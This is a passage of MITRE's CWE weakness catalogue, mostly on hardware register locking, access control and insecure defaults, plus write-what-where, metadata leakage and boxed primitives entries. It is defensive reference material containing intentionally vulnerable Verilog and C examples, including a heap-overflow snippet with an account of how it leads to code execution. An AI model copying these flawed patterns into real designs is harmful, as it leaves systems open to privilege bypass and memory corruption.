AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 - - - - - - Consider the following SoC - design. The sram in HRoT has an address range that is readable and writable by unprivileged - software and it has an area that is only readable by unprivileged software. The tbus - interconnect enforces access control for slaves on the bus but uses only one bit to control - both read and write access. Address 0xA0000000 - 0xA000FFFF is readable and writable - by the untrusted cores core{0-N} and address 0xA0010000 - 0xA001FFFF is only - readable by the untrusted cores core{0-N}. - - - - The security policy access control is not granular enough, as it uses one bit to enable both - read and write access. This gives write access to an area that should only be readable - by unprivileged agents. - - - Access control logic should differentiate between read and write access and to have - sufficient address granularity. - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-05 - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples - - - Tortuga Logic - 2021-07-16 - Provided Demonstrative Example for Hardware Root of Trust - - - - - Hardware description language code incorrectly defines register defaults or hardware IP parameters to insecure values. - - Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. Hardware descriptive languages also support definition of parameter variables, which can be defined in code during instantiation of the hardware IP module. Such parameters are generally used to configure a specific instance of a hardware IP in the design. - The system security settings of a hardware design can be affected by incorrectly defined default values or IP parameters. The hardware IP would be in an insecure state at power reset, and this can be exposed or exploited by untrusted software running on the system. Both register defaults and parameters are hardcoded values, which cannot be changed using software or firmware patches but must be changed in hardware silicon. Thus, such security issues are considerably more difficult to address later in the lifecycle. Hardware designs can have a large number of such parameters and register defaults settings, and it is important to have design tool support to check these settings in an automated way and be able to identify which settings are security sensitive. - - - - - - - - - - - - Implementation - Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases. - - - - - Confidentiality - Integrity - Availability - Access Control - Varies by Context - Degradation of system functionality, or loss of access control enforcement can occur. - - - - - Architecture and Design - During hardware design, all the system parameters and register defaults must be reviewed to identify security sensitive settings. - - - Implementation - The default values of these security sensitive settings need to be defined as part of the design review phase. - - - Testing - Testing phase should use automated tools to test that values are configured per design specifications. - - - - - Consider example design module system verilog code shown below.register_example module is an example parameterized module that defines two parameters, REGISTER_WIDTH and REGISTER_DEFAULT. Register_example module defines a Secure_mode setting, which when set makes the register content read-only and not modifiable by software writes. register_top module instantiates two registers, Insecure_Device_ID_1 and Insecure_Device_ID_2. Generally, registers containing device identifier values are required to be read only to prevent any possibility of software modifying these values. - - // Parameterized Register module example // Secure_mode : REGISTER_DEFAULT[0] : When set to 1 register is read only and not writable// /module register_example s#( parameter REGISTER_WIDTH = 8, // Parameter defines width of register, default 8 bits parameter [REGISTER_WIDTH-1:0] REGISTER_DEFAULT = 2**REGISTER_WIDTH -2 // Default value of register computed from Width. Sets all bits to 1s except bit 0 (Secure _mode) ) ( input [REGISTER_WIDTH-1:0] Data_in, input Clk, input resetn, input write, output reg [REGISTER_WIDTH-1:0] Data_out ); - reg Secure_mode; - always @(posedge Clk or negedge resetn) if (~resetn) begin Data_out <= REGISTER_DEFAULT; // Register content set to Default at reset Secure_mode <= REGISTER_DEFAULT[0]; // Register Secure_mode set at reset end else if (write & ~Secure_mode) begin Data_out <= Data_in; end endmodule - - module register_top ( input Clk, input resetn, input write, input [31:0] Data_in, output reg [31:0] Secure_reg, output reg [31:0] Insecure_reg ); - register_example #( .REGISTER_WIDTH (32), .REGISTER_DEFAULT (1224) // Incorrect Default value used bit 0 is 0. ) Insecure_Device_ID_1 ( .Data_in (Data_in), .Data_out (Secure_reg), .Clk (Clk), .resetn (resetn), .write (write) ); - register_example #( .REGISTER_WIDTH (32) // Default not defined 2^32-2 value will be used as default. ) Insecure_Device_ID_2 ( .Data_in (Data_in), .Data_out (Insecure_reg), .Clk (Clk), .resetn (resetn), .write (write) ); - endmodule - - These example instantiations show how, in a hardware design, it would be possible to instantiate the register module with insecure defaults and parameters. - In the example design, both registers will be software writable since Secure_mode is defined as zero. - - register_example #( .REGISTER_WIDTH (32), .REGISTER_DEFAULT (1225) // Correct default value set, to enable Secure_mode ) Secure_Device_ID_example ( .Data_in (Data_in), .Data_out (Secure_reg), .Clk (Clk), .resetn (resetn), .write (write) ); - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-12-12 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process. - - Integrated circuits and hardware IPs can expose the device configuration controls that need to be programmed after device power reset by a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. In hardware design, this is commonly implemented using a programmable lock bit which enables/disables writing to a protected set of registers or address regions. When the programmable lock bit is set, the relevant address region can be implemented as a hardcoded value in hardware logic that cannot be changed later. - A problem can arise wherein the protected region definition is not granular enough. After the programmable lock bit has been set, then this new functionality cannot be implemented without change to the hardware design. - - - - - - - - - - - - - Architecture and Design - Such issues are introduced during hardware architecture and design since software controls and configuration are defined during these phases and identified later during Testing or System Configuration phases. - - - - - Access Control - Other - System security configuration cannot be defined in a way that does not conflict with functional requirements of device. - - - - - Architecture and Design - - The defining of protected locked registers should be reviewed or tested early in the design phase with software teams to ensure software flows are not blocked by the security locks. - As an alternative to using register lock control bits and fixed access control regions, the hardware design could use programmable security access control configuration so that device trusted firmware can configure and change the protected regions based on software usage and security models. - - - - - - For example, consider a hardware unit with a 32 kilobyte configuration address space where the first 8 kilobyte address contains security sensitive controls that must only be writable by device bootloader. One way to protect the security configuration could be to define a 32 bit system configuration locking register (SYS_LOCK) where each bit lock locks the corresponding 1 kilobyte region. - - - - - Address - Register - - - 0x0000 - SYS_LOCK: 32 bit system configuration lock register, each bit is write-1-once - - - 0x0004 - SECURITY_FEATURE_ENABLE: 32 bit register controlling enabling of security features - - - ... - - - - 0x0310 - SW_MODE: 32 bit Software Mode indication register - - - - - - - Address region - Lock bit - - - 0x0000 - 0x03FF - SYS_LOCK[0] - - - 0x0400 - 0x07FF - SYS_LOCK[1] - - - ... - - - - 0x7C00 - 0x7FFF - SYS_LOCK[31] - - - - - If a register exists within the first kilobyte address range (e.g. SW_MODE, address 0x310) and needs to be software writable at runtime, then this register cannot be written in a securely configured system since SYS_LOCK register lock bit 0 must be set to protect other security settings (e.g. SECURITY_FEATURE_ENABLE, address 0x0004). The only fix would be to change the hardware logic or not set the security lock bit. - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-12-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue. - - Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make them write-once. This means the hardware implementation only allows writing to such registers once, and they become read-only after having been written once by software. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings. - Implementation issues in hardware design of such controls can expose such registers to a race condition security flaw. For example, consider a hardware design that has two different software/firmware modules executing in parallel. One module is trusted (module A) and another is untrusted (module B). In this design it could be possible for Module B to send write cycles to the write-once register before Module A. Since the field is write-once the programmed value from Module A will be ignored and the pre-empted value programmed by Module B will be used by hardware. - - - - - - - - - - - - Architecture and Design - This weakness can appear in designs that use register write-once attributes with two or more software/firmware modules with varying levels of trust executing in parallel. - - - - - Access Control - Bypass Protection Mechanism - System configuration cannot be programmed in a secure way. - - - - - Architecture and Design - During hardware design all register write-once or sticky fields must be evaluated for proper configuration. - - - Testing - The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros. - - - - - consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. - - module register_write_once_example - ( - input [15:0] Data_in, - input Clk, - input ip_resetn, - input global_resetn, - input write, - output reg [15:0] Data_out - ); - - reg Write_once_status; - - always @(posedge Clk or negedge ip_resetn) - if (~ip_resetn) - begin - Data_out <= 16'h0000; - Write_once_status <= 1'b0; - end - else if (write & ~Write_once_status) - begin - Data_out <= Data_in & 16'hFFFE; // Input data written to register after masking bit 0 - Write_once_status <= 1'b1; // Write once status set after first write. - end - else if (~write) - begin - Data_out[15:1] <= Data_out[15:1]; - Data_out[0] <= Write_once_status; - end - - endmodule - - The first system component that sends a write cycle to this register can program the value. This could result in a race condition security issue in SoC design, if an untrusted agent is running in the system in parallel with the trusted component that is expected to program the register. - - Trusted firmware or software trying to set the write-once field. - Must confirm the Write_once_status (bit 0) value is zero, before programming register. If another agent has programmed the register before, then Write_once_status value will be one. - After writing to the register, the trusted software can issue a read to confirm that the valid setting has been programmed. - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-12-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The hardware design control register "sticky bits" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software. - - Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to define default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make the settings write-once or "sticky." This allows writing to such registers only once, whereupon they become read-only. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings. - Failure to implement write-once restrictions in hardware design can expose such registers to being re-programmed by software and written multiple times. For example, write-once fields could be implemented to only be write-protected if they have been set to value "1", wherein they would work as "write-1-once" and not "write-once". - - - - - - - - - - - - Architecture and Design - - - Implementation - Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases. - - - - - Confidentiality - Integrity - Availability - Access Control - Varies by Context - System configuration cannot be programmed in a secure way. - - - - - Architecture and Design - During hardware design all register write-once or sticky fields must be evaluated for proper configuration. - - - Testing - The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros. - - - - - Consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. This implementation can be for a register that is defined by specification to be a write-once register, since the write_once_status field gets written by input data bit 0 on first write. - - module register_write_once_example ( input [15:0] Data_in, input Clk, input ip_resetn, input global_resetn, input write, output reg [15:0] Data_out ); - reg Write_once_status; - always @(posedge Clk or negedge ip_resetn) if (~ip_resetn) begin Data_out <= 16'h0000; Write_once_status <= 1'b0; end else if (write & ~Write_once_status) begin Data_out <= Data_in & 16'hFFFE; Write_once_status <= Data_in[0]; // Input bit 0 sets Write_once_status end else if (~write) begin Data_out[15:1] <= Data_out[15:1]; Data_out[0] <= Write_once_status; end - endmodule - - The above example only locks further writes if write_once_status bit is written to one. So it acts as write_1-Once instead of the write-once attribute. - - module register_write_once_example ( input [15:0] Data_in, input Clk, input ip_resetn, input global_resetn, input write, output reg [15:0] Data_out ); - reg Write_once_status; - always @(posedge Clk or negedge ip_resetn) if (~ip_resetn) begin Data_out <= 16'h0000; Write_once_status <= 1'b0; end else if (write & ~Write_once_status) begin Data_out <= Data_in & 16'hFFFE; Write_once_status <= 1'b1; // Write once status set on first write, independent of input end else if (~write) begin Data_out[15:1] <= Data_out[15:1]; Data_out[0] <= Write_once_status; end - endmodule - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-12-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The product manages resources or behaves in a way that indirectly creates a new, distinct resource that can be used by attackers in violation of the intended policy. - - A product is only expected to behave in a way that was specifically intended by the developer. Resource allocation and management is expected to be performed explicitly by the associated code. However, in systems with complex behavior, the product might indirectly produce new kinds of resources that were never intended in the original design. For example, a covert channel is a resource that was never explicitly intended by the developer, but it is useful to attackers. "Parasitic computing," while not necessarily malicious in nature, effectively tricks a product into performing unintended computations on behalf of another party. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-01-22 - - - - - Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow. - - - - - - - - Resultant - - - - - - - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Access Control - Modify Memory - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - DoS: Crash, Exit, or Restart - Bypass Protection Mechanism - Clearly, write-what-where conditions can be used to write data to areas of memory outside the scope of a policy. Also, they almost invariably can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. If the attacker can overwrite a pointer's worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator. - - - Integrity - Availability - DoS: Crash, Exit, or Restart - Modify Memory - Many memory accesses can lead to program termination, such as when writing to addresses that are invalid for the current process. - - - Access Control - Other - Bypass Protection Mechanism - Other - When the consequence is arbitrary code execution, this can often be used to subvert any other security service. - - - - - Architecture and Design - Language Selection - Use a language that provides appropriate memory abstractions. - - - Operation - Use OS-level preventative functionality integrated after the fact. Not a complete solution. - - - - - The classic example of a write-what-where condition occurs when the accounting information for memory allocations is overwritten in a particular fashion. Here is an example of potentially vulnerable code: - - #define BUFSIZE 256int main(int argc, char **argv) {char *buf1 = (char *) malloc(BUFSIZE);char *buf2 = (char *) malloc(BUFSIZE);strcpy(buf1, argv[1]);free(buf2);} - - Vulnerability in this case is dependent on memory layout. The call to strcpy() can be used to write past the end of buf1, and, with a typical layout, can overwrite the accounting information that the system keeps for buf2 when it is allocated. Note that if the allocation header for buf2 can be overwritten, buf2 itself can be overwritten as well. - The allocation header will generally keep a linked list of memory "chunks". Particularly, there may be a "previous" chunk and a "next" chunk. Here, the previous chunk for buf2 will probably be buf1, and the next chunk may be null. When the free() occurs, most memory allocators will rewrite the linked list using data from buf2. Particularly, the "next" chunk for buf1 will be updated and the "previous" chunk for any subsequent chunk will be updated. The attacker can insert a memory address for the "next" chunk and a value to write into that memory address for the "previous" chunk. - This could be used to overwrite a function pointer that gets dereferenced later, replacing it with a memory address that the attacker has legitimate access to, where they have placed malicious code, resulting in arbitrary code execution. - - - - - Write-what-where condition - - - ARR30-C - Do not form or use out-of-bounds pointers or array subscripts - Imprecise - - - ARR38-C - Guarantee that library functions do not form invalid pointers - Imprecise - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - Imprecise - - - STR32-C - Do not pass a non-null-terminated character sequence to a library function that expects a string - Imprecise - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - - - - The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information. - - Developers might correctly prevent unauthorized access to a database or other resource containing sensitive information, but they might not consider that portions of the original information might also be recorded in metadata, search indices, statistical reports, or other resources. If these resources are not also restricted, then attackers might be able to extract some or all of the original information, or otherwise infer some details. For example, an attacker could specify search terms that are known to be unique to a particular person, or view metadata such as activity or creation dates in order to identify usage patterns. - - - - - - - - - - - - CWE Content Team - MITRE - 2020-01-26 - - - - - The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set. - - In integrated circuits and hardware - intellectual property (IP) cores, device configuration - controls are commonly programmed after a device power - reset by a trusted firmware or software module (e.g., - BIOS/bootloader) and then locked from any further - modification. - - This behavior is commonly implemented using a trusted lock bit. - When set, the lock bit disables writes to a protected set of - registers or address regions. Design or coding errors in - the implementation of the lock bit protection feature - may allow the lock bit to be modified or cleared by - software after it has been set. Attackers might be able to unlock the system and - features that the bit is intended to protect. - - - - - - - Primary - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. - - - - - Access Control - Modify Memory - High - Registers protected by lock bit can be modified even when lock is set. - - - - - Manual Analysis - Set the lock bit. Power cycle the - device. Attempt to clear the lock bit. If the - information is changed, implement a design - fix. Retest. Also, attempt to indirectly clear the lock - bit or bypass it. - High - - - - - Architecture and Design - Implementation - Testing - - - Security lock bit protections must be reviewed for design inconsistency and common weaknesses. - Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing. - - - High - - - - - Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by firmware, and then the register needs to be locked (TEMP_SENSOR_LOCK). - - - - Register - Field description - - - CRITICAL_TEMP_LIMIT - [31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125 - - - TEMP_SENSOR_CALIB - [31:0] Thermal sensor calibration data. Slope value used to map sensor reading to degrees Centigrade. - - - TEMP_SENSOR_LOCK - [31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT and TEMP_SENSOR_CALIB registers; Write-1-once; Default 0 - - - TEMP_HW_SHUTDOWN - [31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write; Default 0 - - - CURRENT_TEMP - [31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0 - - - - In this example, note that if the system heats to critical temperature, the response of the system is controlled by the TEMP_HW_SHUTDOWN bit [1], which is not lockable. Thus, the intended security property of the critical temperature sensor cannot be fully protected, since software can misconfigure the TEMP_HW_SHUTDOWN register even after the lock bit is set to disable the shutdown response. - - To fix this weakness, one could change the TEMP_HW_SHUTDOWN field to be locked by TEMP_SENSOR_LOCK. - - - TEMP_HW_SHUTDOWN - [31:2] Reserved field; Read only; Default 0 [1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0[0] Locked by TEMP_SENSOR_LOCK - - - - - - - - CVE-2017-6283 - chip reset clears critical read/write lock permissions for RSA function - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6283 - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-01-15 - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - Narasimha Kumar V Mangipudi - Lattice Semiconductor - 2021-10-20 - reviewed content changes - - - Hareesh Khattri - Intel Corporation - 2021-10-22 - provided observed example - - - - - Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable. - - Devices may allow device configuration controls which need to be programmed after device power reset via a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. This action is commonly implemented using a programmable lock bit, which, when set, disables writes to a protected set of registers or address regions. - After a power state transition, the lock bit is set to unlocked. Some common weaknesses that can exist in such a protection scheme are that the lock gets cleared, the values of the protected registers get reset, or the lock become programmable. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Modify Memory - High - - - - - Architecture and Design - Implementation - Testing - - - Security Lock bit protections should be reviewed for behavior across supported power state transitions. - Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing including testing across power transitions. - - - High - - - - - - Consider the memory configuration settings of a system that uses DDR3 DRAM memory. Protecting the DRAM memory configuration from modification by software is required to ensure that system memory access control protections cannot be bypassed. This can be done by using lock bit protection that locks all of the memory configuration registers. The memory configuration lock can be set by the BIOS during the boot process. - If such a system also supports a rapid power on mode like hibernate, the DRAM data must be saved to a disk before power is removed and restored back to the DRAM once the system powers back up and before the OS resumes operation after returning from hibernate. - - To support the hibernate transition back to the operating state, the DRAM memory configuration must be reprogrammed even though it was locked previously. As the hibernate resume does a partial reboot, the memory configuration could be altered before the memory lock is set. Functionally the hibernate resume flow requires a bypass of the lock-based protection. The memory configuration must be securely stored and restored by trusted system firmware. Lock settings and system configuration must be restored to the same state it was in before the device entered into the hibernate mode. - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-01-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Description - - - - - The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration. - - Integrated circuits and hardware intellectual properties (IPs) might provide device configuration controls that need to be programmed after device power reset by a trusted firmware or software module, commonly set by BIOS/bootloader. After reset, there can be an expectation that the controls cannot be used to perform any further modification. This behavior is commonly implemented using a trusted lock bit, which can be set to disable writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration). - However, if the lock bit does not effectively write-protect all system registers or controls that could modify the protected system configuration, then an adversary may be able to use software to access the registers/controls and modify the protected hardware configuration. - - - - - - - - Primary - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. - - - - - Access Control - Modify Memory - System Configuration protected by the lock bit can be modified even when the lock is set. - - - - - Manual Analysis - Set the lock bit. Attempt to modify the - information protected by the lock bit. If the information - is changed, implement a design fix. Retest. Also, attempt - to indirectly clear the lock bit or bypass - it. - High - - - - - Architecture and Design - Implementation - Testing - - - Security lock bit protections must be reviewed for design inconsistency and common weaknesses. - Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing. - - - - - - - Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by the firmware. - - - - - Register - Field description - - - CRITICAL_TEMP_LIMIT - - [31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125 - - - - TEMP_SENSOR_CALIB - - [31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write; Default 25 - - - - TEMP_SENSOR_LOCK - - [31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT register; Write-1-once; Default 0 - - - - TEMP_HW_SHUTDOWN - - [31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on a critical temperature detection; Read-write; Default 0 - - - - CURRENT_TEMP - - [31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0 - - - - - - In this example note that only the CRITICAL_TEMP_LIMIT register is protected by the TEMP_SENSOR_LOCK bit, while the security design intent is to protect any modification of the critical temperature detection and response. - - The response of the system, if the system heats to a critical temperature, is controlled by TEMP_HW_SHUTDOWN bit [1], which is not lockable. Also, the TEMP_SENSOR_CALIB register is not protected by the lock bit. - - By modifying the temperature sensor calibration, the conversion of the sensor data to a degree centigrade can be changed, such that the current temperature will never be detected to exceed critical temperature value programmed by the protected lock. - - Similarly, by modifying the TEMP_HW_SHUTDOWN.Enable bit, the system response detection of the current temperature exceeding critical temperature can be disabled. - - - Change TEMP_HW_SHUTDOWN and TEMP_SENSOR_CALIB controls to be locked by TEMP_SENSOR_LOCK. - - - - TEMP_SENSOR_CALIB - - [31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write-Lock; Default 25; Locked by TEMP_SENSOR_LOCK bit[0] - - - - TEMP_HW_SHUTDOWN - - [31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0; Locked by TEMP_SENSOR_LOCK bit[0] - - - - - - - - - CVE-2018-9085 - Certain servers leave a write protection lock bit - unset after boot, potentially allowing modification of - parts of flash memory. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9085 - - - CVE-2014-8273 - Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237]. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273 - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-01-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - Narasimha Kumar V Mangipudi - Lattice Semiconductor - 2021-10-20 - reviewed content changes - - - - - System configuration protection may be bypassed during debug mode. - - Device configuration controls are commonly programmed after a device power reset by a trusted firmware or software module (e.g., BIOS/bootloader) and then locked from any further modification. This is commonly implemented using a trusted lock bit, which when set, disables writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration). If debug features supported by hardware or internal modes/system states are supported in the hardware design, modification of the lock protection may be allowed allowing access and modification of configuration information. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - High - Bypass of lock bit allows access and modification of system configuration even when the lock bit is set. - - - - - Architecture and Design - Implementation - Testing - - - Security Lock bit protections should be reviewed for any bypass/override modes supported. - Any supported override modes either should be removed or protected using authenticated debug modes. - Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing. - - - High - - - - - - For example, consider the example Locked_override_register example. This register module supports a lock mode that blocks any writes after lock is set to 1. - - However, it also allows override of the lock protection when scan_mode or debug_unlocked modes are active. - - - module Locked_register_example - ( - input [15:0] Data_in, - input Clk, - input resetn, - input write, - input Lock, - input scan_mode, - input debug_unlocked, - output reg [15:0] Data_out - ); - - reg lock_status; - - always @(posedge Clk or negedge resetn) - if (~resetn) // Register is reset resetn - begin - lock_status <= 1'b0; - end - else if (Lock) - begin - lock_status <= 1'b1; - end - else if (~Lock) - begin - lock_status <= lock_status - end - - always @(posedge Clk or negedge resetn) - if (~resetn) // Register is reset resetn - begin - Data_out <= 16'h0000; - end - else if (write & (~lock_status | scan_mode | debug_unlocked) ) // Register protected by Lock bit input, overrides supported for scan_mode & debug_unlocked - begin - Data_out <= Data_in; - end - else if (~write) - begin - Data_out <= Data_out; - end - - endmodule - - If either the scan_mode or the debug_unlocked modes can be triggered by software, then the lock protection may be bypassed. - - Either remove the debug and scan mode overrides or protect enabling of these modes so that only trusted and authorized users may enable these modes. - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-01-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns - - - - - The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations. - - Languages such as Java and C# support automatic conversion through their respective compilers from primitive types into objects of the corresponding wrapper classes, and vice versa. For example, a compiler might convert an int to Integer (called autoboxing) or an Integer to int (called unboxing). This eliminates forcing the programmer to perform these conversions manually, which makes the code cleaner. - However, this feature comes at a cost of performance and can lead to resource exhaustion and impact availability when used with generic collections. Therefore, they should not be used for scientific computing or other performance critical operations. They are only suited to support "impedance mismatch" between reference types and primitives. - - - - - - - - - - - - - - Implementation - The programmer may use boxed primitives when not strictly necessary. - - - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - Reduce Performance - Low - Incorrect autoboxing/unboxing would result in reduced performance, which sometimes can lead to resource consumption issues. - - - - - Implementation - Use of boxed primitives should be limited to certain situations such as when calling methods with typed parameters. Examine the use of boxed primitives 